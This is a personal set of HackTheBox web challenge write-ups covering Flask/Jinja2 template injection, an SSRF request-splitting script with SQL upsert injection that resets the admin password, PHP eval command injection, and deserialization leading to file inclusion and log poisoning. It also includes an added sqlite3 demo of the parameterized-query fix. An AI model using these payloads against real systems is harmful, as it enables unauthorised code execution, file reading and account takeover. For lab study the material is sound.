Challenges->active challenges
Templated
A very simple Flask/Jinja2 template injection.
```jinja
{% for c in ''.__class__.__base__.__subclasses__() %}
  {% if c.__name__ == 'catch_warnings' %}
    {{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat flag.txt').read()") }}
  {% endif %}
{% endfor %}
```
No filtering at all; the only difficulty is probably that you cannot tell at first glance where the injection point is, and F12 shows nothing.
Phonebook
Did not solve it; had no clue.
·············· divider ··············
On entering the target you notice it is a login page. I tried single and double quotes, which just showed "login failed". The URL's ?message parameter supplies the error text, so editing the URL changes the message in the red box, but that is not useful. Below it there is a blue hint box.
Entering "\" makes the page fail to load, entering "*" gets into the search page, and entering 1 returns a user's information; then I got stuck.
·············· divider ··············
writeup:https://blog.csdn.net/galaxy3000/article/details/122975302?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522169052768016800184190415%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=169052768016800184190415&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-2-122975302-null-null.142^v91^koosearch_v1,239^v3^insert_chatgpt&utm_term=hackthebox%20phonebook&spm=1018.2226.3001.4187
Reading the writeup, it turns out to be fuzzing.
What is that?
Fuzzing finds software vulnerabilities by feeding a target system unexpected input and watching for abnormal results: you attack a program with random malformed data (also called fuzz) and then watch where it breaks. The trick of fuzz testing is to throw as much messy data at the program as possible.
Solving the challenge requires finding the administrator's password, and the hint shown before login tells you who the administrator is; looking it up, the admin username is reese.
Next you need to write a script to brute-force it, which takes a long time, but my network was too poor to get a result.
Weather APP
Server-side request forgery plus an SQL password update.
·············· divider ··············
In index.js you can see:
```javascript
if (req.socket.remoteAddress.replace(/^.*:/, '') != '127.0.0.1') {
    return res.status(401).end();
}
...
if (admin) return res.send(fs.readFileSync('/app/flag').toString());
```
So this challenge requires forging the request and logging in as the administrator.
In database.js you can see:
```javascript
INSERT INTO users (username, password) VALUES ('admin', '${ crypto.randomBytes(32).toString('hex') }');
...
let query = `INSERT INTO users (username, password) VALUES ('${user}', '${pass}')`;
```
The admin password is set to a random hex string and the username column is unique, but the registration page does no filtering, so you can turn the insert into a password update (upsert).
(I think sqli-labs lesson 17 is a password update too.)
·············· divider ··············
wp: https://blog.csdn.net/wanmiqi/article/details/115873643
Script:
```python
import requests

url = "http://157.245.39.76:31075"
username = 'admin'
password = "1111') ON CONFLICT(username) DO UPDATE SET password = 'admin';--"
parseUsername = username.replace(" ", "\u0120").replace("'", "%27").replace('"', "%22")
parsePassword = password.replace(" ", "\u0120").replace("'", "%27").replace('"', "%22")
contentLength = len(parseUsername) + len(parsePassword) + 19
endpoint = '127.0.0.1/\u0120HTTP/1.1\u010D\u010AHost:\u0120127.0.0.1\u010D\u010A\u010D\u010APOST\u0120/register\u0120HTTP/1.1\u010D\u010AHOST:\u0120127.0.0.1\u010D\u010AContent-Type:\u0120application/x-www-form-urlencoded\u010D\u010AContent-Length:\u0120' + str(contentLength) + '\u010D\u010A\u010D\u010Ausername=' + parseUsername + '&password=' + parsePassword + '\u010D\u010A\u010D\u010AGET\u0120/?lol='
r = requests.post(url + '/api/weather', json={'endpoint': endpoint, 'city': 'chengdu', 'country': 'CN'})
print(r)
```
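To make the upsert problem and its fix concrete, here is an added example (not code from the challenge or the writeup) that rebuilds the users table in Python's built-in sqlite3 module and runs the writeup's password payload through a register function that interpolates strings the way database.js does, and then through a parameterized one. The schema is constructed to mirror the challenge (username assumed UNIQUE, admin password generated with secrets.token_hex instead of crypto.randomBytes).

```python
import secrets
import sqlite3

# Constructed in-memory schema mirroring database.js: username is UNIQUE
# and admin gets a random hex password (secrets.token_hex here, not crypto.randomBytes).
def setup_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT UNIQUE, password TEXT)")
    db.execute(f"INSERT INTO users (username, password) VALUES ('admin', '{secrets.token_hex(32)}')")
    db.commit()
    return db

def register_vulnerable(db, user, pwd):
    # Same string interpolation as the challenge: user text is parsed as SQL,
    # so a crafted password turns the INSERT into an UPSERT on the admin row.
    db.execute(f"INSERT INTO users (username, password) VALUES ('{user}', '{pwd}')")
    db.commit()

def register_safe(db, user, pwd):
    # Parameterized query: values are bound as data, never parsed as SQL.
    # A duplicate username hits the UNIQUE constraint and is refused.
    try:
        db.execute("INSERT INTO users (username, password) VALUES (?, ?)", (user, pwd))
        db.commit()
        return True
    except sqlite3.IntegrityError:
        return False

def password_of(db, user):
    row = db.execute("SELECT password FROM users WHERE username = ?", (user,)).fetchone()
    return row[0] if row else None

# The password value from the writeup script above
PAYLOAD = "1111') ON CONFLICT(username) DO UPDATE SET password = 'admin';--"

def demo():
    results = {}
    db = setup_db()
    register_vulnerable(db, "admin", PAYLOAD)
    results["vulnerable_admin_pw"] = password_of(db, "admin")  # 'admin': overwritten

    db = setup_db()
    original = password_of(db, "admin")
    results["safe_admin_accepted"] = register_safe(db, "admin", PAYLOAD)  # False
    results["safe_admin_unchanged"] = password_of(db, "admin") == original  # True
    results["safe_other_accepted"] = register_safe(db, "alice", PAYLOAD)  # True
    results["safe_other_pw_literal"] = password_of(db, "alice") == PAYLOAD  # True
    return results
```

Call demo() to see both outcomes side by side: the interpolated query rewrites admin's password, while the parameterized query refuses the duplicate username and stores the payload for a new user as a literal string.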
LoveTok
Command injection.
·············· divider ··············
In TimeController.php:
```php
$format = isset($_GET['format']) ? $_GET['format'] : 'r';
$time = new TimeModel($format);
```
TimeModel.php:
```php
class TimeModel
{
    public function __construct($format)
    {
        $this->format = addslashes($format);

        [ $d, $h, $m, $s ] = [ rand(1, 6), rand(1, 23), rand(1, 59), rand(1, 69) ];
        $this->prediction = "+${d} day +${h} hour +${m} minute +${s} second";
    }

    public function getTime()
    {
        eval('$time = date("' . $this->format . '", strtotime("' . $this->prediction . '"));');
        return isset($time) ? $time : 'Something went terribly wrong';
    }
}
```
The input (format) gets only a trivial filter (addslashes) before being passed straight into eval.
·············· divider ··············
wp:https://shakuganz.com/2021/06/23/hackthebox-lovetok-write-up/
Some reflections
Both Weather App and LoveTok come with many files, most of them useless; the breakthrough only comes from finding the usable vulnerability among all of it.
LoveTok also reads the $_SERVER variable, but that does not seem to be useful; count it as a distraction.
Only by patiently reading through the challenge logic can you know roughly what to do, and you have to read a lot, otherwise you will not even know what the challenge is asking.
Toxic
Download the source; at a glance it is PHP deserialization, but after working through it, it is really command injection plus file inclusion.
·············· divider ··············
index.php:
```php
<?php
spl_autoload_register(function ($name){
    if (preg_match('/Model$/', $name))
    {
        $name = "models/${name}";
    }
    include_once "${name}.php";
});

if (empty($_COOKIE['PHPSESSID']))
{
    $page = new PageModel;
    $page->file = '/www/index.html';

    setcookie(
        'PHPSESSID',
        base64_encode(serialize($page)),
        time()+60*60*24,
        '/'
    );
}

$cookie = base64_decode($_COOKIE['PHPSESSID']);
unserialize($cookie);
```
PageModel.php:
```php
<?php
class PageModel
{
    public $file;

    public function __destruct()
    {
        include($this->file);
    }
}
```
From the source: on every page refresh a cookie is sent whose content is the file to be opened, serialized and then base64-encoded, with no filtering.
1. Decode the cookie and change the file to read to "/etc/passwd".
2. Find the nginx user; change the file to read to "/var/log/nginx/access.log" to read the log file.
3. Find that the log records the request's User-Agent header; change it to <?php system('ls /'); ?> to inject a command.
4. Find the flag file, then change the request header again to inject a command that reads the flag.
·············· divider ··············
wp:https://blog.csdn.net/qq_40952713/article/details/119795157